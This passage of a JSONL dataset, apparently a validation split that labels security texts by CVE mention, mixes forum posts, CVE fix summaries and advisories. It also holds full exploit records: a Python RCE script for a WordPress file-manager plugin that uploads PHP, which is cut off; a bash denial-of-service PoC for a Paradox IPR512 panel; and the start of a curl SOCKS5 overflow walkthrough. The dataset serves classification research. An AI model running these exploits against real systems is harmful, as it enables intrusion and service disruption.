"timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c2ab5e318d65ea11b99e", "text": "Already after studying it, I achieved my goal. Thanks for a tips am sure they will be helpful to me and other people!", "source": "parrotsec", "timestamp": "2022-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "9a9b4cc80a20043d06bc", "text": "Yea same here @roguebandit self learning now for 4 years still don’t know anything to be any kind of a threat to real threats but that has to do with memory retention and mold poisoning but anywhoo yea this info was a definite help for sure if I could maybe add a like adage to his question not just for u but anyone who wants to chime in other than basic hacker understanding where would u start with computer in general to give u the better edge asking a network first learning a programming language cause even though I been learning for three years almost four I’m so still light-years from anyreal career in this I feel", "source": "parrotsec", "timestamp": "2022-04-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5ddee50d8e9df416c55e", "text": "me too .But I got the next flag. I entered his backstage and got the next flag, indicating that the backstage can be broken", "source": "hackthebox", "timestamp": "2022-12-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d7b8e1de913974f06ebe", "text": "Got a TP-Link adapter tl-wn722n working perfectly with my pc. Thanks For your help… You can get from here on Amazon .", "source": "parrotsec", "timestamp": "2023-01-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "aae15598c36afcbecb29", "text": "Hy everyone, I am at flag5. I have a webshell and try to get a meterpreter revshell using the multi/http/tomcat_mgr_upload moudle, I set username,password, RPORTS, LPORT=8080 but when I start the exploit it gives back this message: image 1925×153 8.57 KB Does somebody know why the server does not return a fingerprint even though it is clearly running under 8080? Btw: does somebody know how to execute msfvenom war payloads on the webserver. Do I just need to click on it? Because I only get a error message and no callback to my multi/handler . image 822×675 52.6 KB image 893×291 25.8 KB", "source": "hackthebox", "timestamp": "2023-12-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f2660650cc4f8c47fb22", "text": "CVE: CVE-2022-2126\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5123: using invalid index when looking for spell suggestions\n\nProblem: Using invalid index when looking for spell suggestions.\nSolution: Do not decrement the index when it is zero.", "source": "cvefixes", "timestamp": "2022-06-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a7ba74e1b96c5b00a898", "text": "CVE: CVE-2021-23158\n\n[{'lang': 'en', 'value': 'A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service.'}]\n\nFix commit: Fix JPEG error handling (Issue #415)", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b1c40a467be60d40706c", "text": "im horribly stuck on this also i did setup the loop at 0…27 and the converted base64 has a wordcount of 34071 am i on the right path for that component? when i assign this number to the salt variable and run the script im getting error bad decrypt 140171867060112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:618: any clues would be great", "source": "hackthebox", "timestamp": "2022-04-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "021c25a273ee44f29453", "text": "API for CTF Challenge\n\nCan hack the box be used for a CTF challenge? I want the API to interact with my website and create challenges for various age groups", "source": "hackthebox", "timestamp": "2023-11-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f6e655221da30f1b9864", "text": "File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)\n\n# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)\n# Date: 05/31/2023\n# Exploit Author: Mateus Machado Tesser\n# Vendor Homepage: https://advancedfilemanager.com/\n# Version: File Manager Advanced Shortcode 2.3.2\n# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15\n# CVE: CVE-2023-2068\n\nimport requests\nimport json\nimport pprint\nimport sys\nimport re\n\nPROCESS = \"\\033[1;34;40m[*]\\033[0m\"\nSUCCESS = \"\\033[1;32;40m[+]\\033[0m\"\nFAIL = \"\\033[1;31;40m[-]\\033[0m\"\n\ntry:\n\tCOMMAND = sys.argv[2]\n\tIP = sys.argv[1]\n\tif len(COMMAND) > 1:\n\t\tpass\n\tif IP:\n\t\tpass\n\telse:\n\t\tprint(f'Use: {sys.argv[0]} IP COMMAND')\nexcept:\n\tpass\n\nurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel\nprint(f\"{PROCESS} Searching fmakey\")\n\ntry:\n\tr = requests.get(url)\n\traw_fmakey = r.text\n\tfmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split(\"'\")[1]\n\tif len(fmakey) == 0:\n\t\tprint(f\"{FAIL} Cannot found fmakey!\")\nexcept:\n\tprint(f\"{FAIL} Cannot found fmakey!\")\n\nprint(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')\nurl = \"http://\"+IP+\"/wp-admin/admin-ajax.php\"\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1\", \"Accept\": \"*/*\"}\ndata = \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"reqid\\\"\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"cmd\\\"\\r\\n\\r\\nupload\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"target\\\"\\r\\n\\r\\nl1_Lw\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\\\"\\r\\n\\r\\nexploit.php\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"action\\\"\\r\\n\\r\\nfma_load_shortcode_fma_ui\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"_fmakey\\\"\\r\\n\\r\\n\"+fmakey+\"\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"path\\\"\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"url\\\"\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"w\\\"\\r\\n\\r\\nfalse\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"r\\\"\\r\\n\\r\\ntrue\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"hide\\\"\\r\\n\\r\\nplugins\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"operations\\\"\\r\\n\\r\\nupload,download\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"path_type\\\"\\r\\n\\r\\ninside\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"hide_path\\\"\\r\\n\\r\\nno\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"enable_trash\\\"\\r\\n\\r\\nno\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"upload_allow\\\"\\r\\n\\r\\ntext/x-php\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"upload_max_size\\\"\\r\\n\\r\\n2G\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"upload[]\\\"; filename=\\\"exploit2.php\\\"\\r\\nContent-Type: text/x-php\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"mtime[]\\\"\\r\\n\\r\\n\\r\\n------WebKitFormBoundaryI52DGCOt37rixRS1--\\r\\n\"\nr = requests.post(url, headers=headers, data=data)\nprint(f\"{PROCESS} Sending AJAX request to: {url}\")\nif 'errUploadMime' in r.text:\n\tprint(f'{FAIL} Exploit failed!')\n\tsys.ex", "source": "exploitdb", "timestamp": "2023-06-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6e447be7cd4d41e1dd39", "text": "LOL, what a Dumbo I am. Several days stuck with the task…just because I did not understand the task properly. So, save your time if you are stuck too. Disassemble, loop, iterate through RDX and save all results of the looping…and then just delete 0x and join the bytes together. No switching around. Just load it, run it and you will see the value you are looking for. Its straigthforward, not a trap.", "source": "hackthebox", "timestamp": "2023-11-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c59f987106fc6f0b945f", "text": "CVE: CVE-2022-34035\n\n[{'lang': 'en', 'value': 'HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.'}]\n\nFix commit: Fix a crash bug with bogus text (Issue #426)", "source": "cvefixes", "timestamp": "2022-07-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "08b1e92a50756d283609", "text": "Paradox Security Systems IPR512 - Denial Of Service\n\n#!/bin/bash\n\n# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service\n# Google Dork: intitle:\"ipr512 * - login screen\"\n# Date: 09-APR-2023\n# Exploit Author: Giorgi Dograshvili\n# Vendor Homepage: Paradox - Headquarters (https://www.paradox.com/Products/default.asp?PID=423)\n# Version: IPR512\n# CVE : CVE-2023-24709\n\n# Function to display banner message\ndisplay_banner() {\n echo \"******************************************************\"\n echo \"* *\"\n echo \"* PoC CVE-2023-24709 *\"\n echo \"* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *\"\n echo \"* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *\"\n echo \"* by SlashXzerozero *\"\n echo \"* *\"\n echo \"******************************************************\"\n}\n\n# Call the function to display the banner\ndisplay_banner\n echo \"\"\n echo \"\"\n echo \"Please enter a domain name or IP address with or without port\"\nread -p \"(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): \" domain\n\n# Step 2: Ask for user confirmation\nread -p \"This will DAMAGE the service. Do you still want it to proceed? (Y/n): \" confirm\nif [[ $confirm == \"Y\" || $confirm == \"y\" ]]; then\n # Display loading animation\n animation=(\"|\" \"/\" \"-\" \"\\\\\")\n index=0\n while [[ $index -lt 10 ]]; do\n echo -ne \"Loading ${animation[index]} \\r\"\n sleep 1\n index=$((index + 1))\n done\n\n # Use curl to send HTTP GET request with custom headers and timeout\n response=$(curl -i -s -k -X GET \\\n -H \"Host: $domain\" \\\n -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36\" \\\n -H \"Accept: */\" \\\n -H \"Referer: http://$domain/login.html\" \\\n -H \"Accept-Encoding: gzip, deflate\" \\\n -H \"Accept-Language: en-US,en;q=0.9\" \\\n -H \"Connection: close\" \\\n --max-time 10 \\\n \"http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982\")\n\n # Check response for HTTP status code 200 and print result\n if [[ $response == *\"HTTP/1.1 200 OK\"* ]]; then\n echo -e \"\\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html\"\n else\n echo -e \"\\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html\"\n fi\nelse\n echo \"The script is stopped!.\"\nfi", "source": "exploitdb", "timestamp": "2023-04-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "afa7d3f17ffa9736cce0", "text": "CVE: CVE-2022-31112\n\n[{'lang': 'en', 'value': 'Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In affected versions parse Server LiveQuery does not remove protected fields in classes, passing them to the client. The LiveQueryController now removes protected fields from the client response. Users are advised to upgrade. Users unable t upgrade should use `Parse.Cloud.afterLiveQueryEvent` to manually remove protected fields.'}]\n\nFix commit: fix: protected fields exposed via LiveQuery (GHSA-crrq-vr9j-fxxh) [skip release] (#8076)", "source": "cvefixes", "timestamp": "2022-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "661b84b6a54200f2e8f1", "text": "Exploiting File Upload Vulnerability for images embedded as src=\"data:image/jpeg;base64\"\n\nHi there, every now and then I stumble over web apps that are based on JavaScript / JSON frameworks. There is a functionality to upload images, which I can bypass to upload a shell or other file types. However, when displaying the image via the web app, the image is embedded usually in the following way: Do you see any way to exploit this anyway? So far, I have been capturing the HTTP requests to check from which directory the file has been pulled from and try to access the file directly from there.", "source": "hackersploit", "timestamp": "2022-12-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5ed3192f4931f86b53b7", "text": "SSLKEYLOGFILE\n\nAm trying to log the SSLKEYLOGFILE on parort security os can anyone direct me on how to do that ? Thanks", "source": "parrotsec", "timestamp": "2023-05-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c20f877e43d34ac6ba17", "text": "Screen Reader\n\nparrot_screen_reader_logo 690×500 14.3 KB When it comes to an offline Screen Reader there are options on Parrot like Orca or Festival , which are Accessibility-focused but normally this type of software is pointed towards usability -and over-complicated extensibility- more than voice quality, in this case we aim to a more Natural Voice , so articles, emails or chats can be heard without a so robotic tone. 1. Dependency Installs apt install libmp3-info-perl libmp3-tag-perl libsox-fmt-mp3 libunicode-string-perl sox xsel mpg321 python3-pip 2. gTTS Install This is why you require pip (Python Package Installer) also gTTS (Google Text-to-Speech), library and CLI tool to interface with Google Translate’s text-to-speech API, that’s what makes most of the job. pip install gTTS 3. Execution Scripts There are two ways to do this, the Manual way and the Manuel way. “Manual” Way CLI-ready, Select, Execute : Select a text placed anywhere on your desktop, xsel will pipeline the order on the CLI and you’ll hear the voice reading. English Voice xsel | gtts-cli --nocheck - | mpg321 - Spanish Voice xsel | gtts-cli --nocheck --lang es - | mpg321 - “Manuel” Way Just create a keyboard shortcut or keybinding: Parrot comes with MATE so you can just Add another one to the existing list, it’ll do the same work. Bind the command to a key combination e.g., Ctrl + Shift + R . English Voice bash -c \"xsel | gtts-cli --nocheck - | mpg321 -\" Spanish Voice bash -c \"xsel | gtts-cli --nocheck --lang es - | mpg321 -\" What’s next? Well, I would say being able to control the playing, like pause and resume functions, a GUI maybe? However, if you know an existing implementation (or have made one) for such things you can PM me anytime here or over the Telegram groups and make great things with this one.", "source": "parrotsec", "timestamp": "2022-04-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7bee6e2974fb0b37cc6e", "text": "You need to format the pen-drive to X Fats [it has more capabilities than fats 32] the SHA sum is given on the download page before you hit the button try Balena etcher not Rufus the age, previous use and quality of the pen-drive can all affect its performance, I always recommend a good quality branded one preferably not exceeding 16gb cheap ones are fine for storage but often give trouble as a bootable ISO. you will find a link explaining how to check your SHA halfway down my how do I guide Linux Tips – 26 Jan 22 How Do I Install Linux (A General Guide) • Linux Tips Today, I will try to answer one of the most common questions asked by the newcomer to Linux; “How do I install Linux” Est. reading time: 5 minutes", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "92b89f4d6cbaafdec46f", "text": "CVE: CVE-2022-21740\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `SparseCountSparseOutput` is vulnerable to a heap overflow. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Further validate sparse tensor for `SparseCount`: indices must be valid within dense shape.\n\nPiperOrigin-RevId: 414888122\nChange-Id: I4552bd74c135ecd4bcb5448acc0a3ce9402d8286", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "383c217ad34a637f16fb", "text": "Hello. It’s not about ParrotOS as you are talking about a hardware component, however no, it’s nothing weird, you just bought a plug-and-play adapter (the drivers should already be installed in the distro). I would suggest you to better read the technical specifications of this wifi adapter.", "source": "parrotsec", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5d07a38ed75cd1cb6a2c", "text": "heck cybrary.it, opensecuritytraining.info And then check Offensive Computer Security on hackallthethings also", "source": "parrotsec", "timestamp": "2022-03-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4adec1caf1080d363d5c", "text": "OpenStack Glance Denial of service by creating a large number of images\n\n[Severity: HIGH]\n\nOpenStack Image Registry and Delivery Service (Glance) 2014.2 through 2014.2.2 does not properly remove images, which allows remote authenticated users to cause a denial of service (disk consumption) by creating a large number of images using the task v2 API and then deleting them before the uploads finish, a different vulnerability than CVE-2015-1881.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "aba82ac2277c82b4d920", "text": "Hi, You have to find a Command Injection Method (||), from there t’r’y different bypass methods. Using and bypass method for / should work.", "source": "hackthebox", "timestamp": "2022-08-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6a6d74202484380385db", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8503, CVE-2018-8510, CVE-2018-8511, CVE-2018-8513.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5af85a1d3685a0d5b928", "text": "Hey @Rapunzel3000 were you able to figure this out? I am also stuck on trying to use the rockyou-30 wordlist. I tried cleaning up the wordlist but no luck so far due to not having the permissions to use sed", "source": "hackthebox", "timestamp": "2022-01-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "75163069f88bac0378f4", "text": "CVE: CVE-2022-31084\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 There are cases where LAM instantiates objects from arbitrary classes. An attacker can inject the first constructor argument. This can lead to code execution if non-LAM classes are instantiated that execute code during object creation. This issue has been fixed in version 8.0.'}]\n\nFix commit: Merge pull request from GHSA-r387-grjx-qgvw\n\nFixes", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0e274e63c3f74acf74df", "text": "CVE: CVE-2022-29200\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.LSTMBlockCell` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate the ranks of any of the arguments to this API call. This results in `CHECK`-failures when the elements of the tensor are accessed. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix security vulnerability with LSTMBlockCellOp\n\nPiperOrigin-RevId: 446028341", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9acbe1933b87da6e9fe2", "text": "I am a hardware man not a hacker, from my point of view TP-Link products are pretty good, the only possible problem is you may need an alternative web connection to download any chip specific drivers, TP use Realtek chipsets", "source": "parrotsec", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6880bc9c2b1acc8df97a", "text": "Authlogic Information Exposure vulnerability\n\n[Severity: MEDIUM]\n\nThe Authlogic gem for Ruby on Rails prior to version 3.3.0 makes potentially unsafe `find_by_id` method calls, which might allow remote attackers to conduct CVE-2012-6496 SQL injection attacks via a crafted parameter in environments that have a known secret_token value, as demonstrated by a value contained in `secret_token.rb` in an open-source product.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2624a53a88e537a75c91", "text": "How can you make the shell script run up when parrot operation system boot up?\n\nI want to run a shell script when parrot boot,but I went through all about how to get the shell script boot to run automatically and still have no clue.", "source": "parrotsec", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "113353a1dd49225428ce", "text": "CVE: CVE-2022-0326\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: no `OP_HASHADD` required when `val` is false.", "source": "cvefixes", "timestamp": "2022-01-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "82afd14a0b8909518eab", "text": "Empire error on running\n\ni have this error ──╼ $./empire File “/home/karbar/Empire/./empire”, line 35 print ‘[ ] Fresh start in docker, running reset.sh for you’ ^ SyntaxError: Missing parentheses in call to ‘print’. Did you mean print(’[ ] Fresh start in docker, running reset.sh for you’)?", "source": "parrotsec", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1e0737eb43015da46f65", "text": "2 years Cyberbullying on Insta - Help!\n\nHey All, I need help! My partner has been cyber-bullied, defamed and harassed by a random person on several fake Instagram accounts for the past 2 years. We are from a religious family so it is upsetting what rumours they have been spreading around my/her extended family/friends' and public posts. If you can help me locate this person so I can stop them, it would seriously change mine and her life. I have screenshots of some account names on public posts - they seem to deactivate the accounts then re-activate when they want to attack. Thank you for taking the time to read this. I hope there is help! Kind Regards", "source": "go4expert", "timestamp": "2022-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "aeddab44b9fe29a7ee7e", "text": "CVE: CVE-2022-1767\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7.'}]\n\nFix commit: 18.0.7 release", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "34072233ff4fee546d6c", "text": "CVE: CVE-2022-25854\n\n[{'lang': 'en', 'value': 'This affects the package @yaireo/tagify before 4.9.8. The package is used for rendering UI components inside the input or text fields, and an attacker can pass a malicious placeholder value to it to fire the XSS payload.'}]\n\nFix commit: fixes #989 - fix XSS", "source": "cvefixes", "timestamp": "2022-04-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "45deeb9055cde8e3d9b0", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-03-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b1d77f9f213b3f016d69", "text": "CVE: CVE-2021-25981\n\n[{'lang': 'en', 'value': 'In Talkyard, regular versions v0.2021.20 through v0.2021.33 and dev versions v0.2021.20 through v0.2021.34, are vulnerable to Insufficient Session Expiration. This may allow an attacker to reuse the admin’s still-valid session token even when logged-out, to gain admin privileges, given the attacker is able to obtain that token (via other, hypothetical attacks)'}]\n\nFix commit: Better session ids, 5 parts, feature flag to enable.", "source": "cvefixes", "timestamp": "2022-01-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "555f8ad441439d69ad7c", "text": "CVE: CVE-2022-0822\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository orchardcms/orchardcore prior to 1.3.0.'}]\n\nFix commit: Fix missing permission checks and encoding. (#11344)", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0a2a71ccc2f150c43da7", "text": "I don’t know if this is still relevant, but you should think where you could else use the found credentials.", "source": "hackthebox", "timestamp": "2023-08-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8cba5f0786e3c4de7d82", "text": "CVE: CVE-2022-1988\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository neorazorx/facturascripts prior to 2022.09.'}]\n\nFix commit: - Añadida comprobación de html en descripción al test unitario del modelo cuenta.\n- Eliminado el test unitario de subcuenta por obsoleto. Se creará uno nuevo a continuación.", "source": "cvefixes", "timestamp": "2022-06-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0cc67b6ce28568d4bf30", "text": "I do not want to spoil here. You can DM me if you still need help.", "source": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f5555e94ad5a528f979e", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8280, CVE-2018-8286, CVE-2018-8294.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c909ebf68a21a9316b41", "text": "JWS and JWT signature validation vulnerability with special characters\n\n[Severity: HIGH]\n\n### Impact\n\nJsrsasign supports JWS(JSON Web Signatures) and JWT(JSON Web Token) validation. However JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake.\n\nFor example, even if a string of non Base64URL encoding characters such as `!@$%` or `\\11` is inserted into a valid JWS or JWT signature value string, it will still be a valid JWS or JWT signature by mistake.\n\nWhen jsrsasign's JWS or JWT validation is used in OpenID connect or OAuth2, this vulnerability will affect to authentication or authorization.\n\nBy our internal assessment, CVSS 3.1 score will be 8.6.\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N\n\n### Patches\nUsers validate JWS or JWT signatures should upgrade to 10.5.25.\n\n### Workarounds\nValidate JWS or JWT signature if it has Base64URL and dot safe string before\nexecuting JWS.verify() or JWS.verifyJWT() method.\n\n### ACKNOWLEDGEMENT\n\nThanks to Adi Malyanker and Or David for this vulnerability report. Also thanks for [Snyk security team](https://snyk.io/) for this coordination.\n\n### References\nhttps://github.com/kjur/jsrsasign/releases/tag/10.5.25\nhttps://github.com/kjur/jsrsasign/security/advisories/GHSA-3fvg-4v2m-98jf kjur's advisories\nhttps://github.com/advisories/GHSA-3fvg-4v2m-98jf github advisories\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25898\nhttps://kjur.github.io/jsrsasign/api/symbols/KJUR.jws.JWS.html#.verifyJWT\nhttps://kjur.github.io/jsrsasign/api/symbols/KJUR.jws.JWS.html#.verify\nhttps://kjur.github.io/jsrsasign/api/symbols/global__.html#.isBase64URLDot\nhttps://github.com/kjur/jsrsasign/wiki/Tutorial-for-JWS-verification\nhttps://github.com/kjur/jsrsasign/wiki/Tutorial-for-JWT-verification\nhttps://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-2869122\n", "source": "github_advisory", "timestamp": "2022-06-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a010208c6a153e51b995", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-09-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "023c252a6b35cbf3fd6b", "text": "[Heap Overflow] CVE-2023-38545: socks5 heap buffer overflow\n\n# Summary:\n\nThe SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:\n\n1. The request is made via socks5h.\n2. The state machine's negotiation buffer is smaller than ~65k.\n3. The SOCKS server's \"hello\" reply is delayed.\n4. The attacker sets a final destination hostname larger than the negotiation\nbuffer.\n\nlibcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames larger than 255 but will not due to a state machine bug.\n\nFor example tor user running libcurl app with follow location that connects to rogue onion server that replies with payload in `Location:` header which causes crash or worse.\n\n# Walkthrough:\n\n`do_SOCKS` initializes local variable `socks5_resolve_local` depending on the `CURLPROXY_` name. There are two relevant names for this state machine:\n\n- `CURLPROXY_SOCKS5` (SOCKS5 with local resolve of dest host)\n- `CURLPROXY_SOCKS5_HOSTNAME` (SOCKS5 with remote resolve of dest host)\n\n[Code:](https://github.com/curl/curl/blob/curl-8_3_0/lib/socks.c#L573-L574)\n~~~c\n bool socks5_resolve_local =\n (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;\n~~~\n\nFor this scenario, `CURLPROXY_SOCKS5_HOSTNAME` is the name and `socks5_resolve_local` is initialized FALSE.\n\nThe `do_SOCKS` state machine is entered for the first time for the connection. `sx->state` is `CONNECT_SOCKS_INIT` (which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets `socks5_resolve_local` to 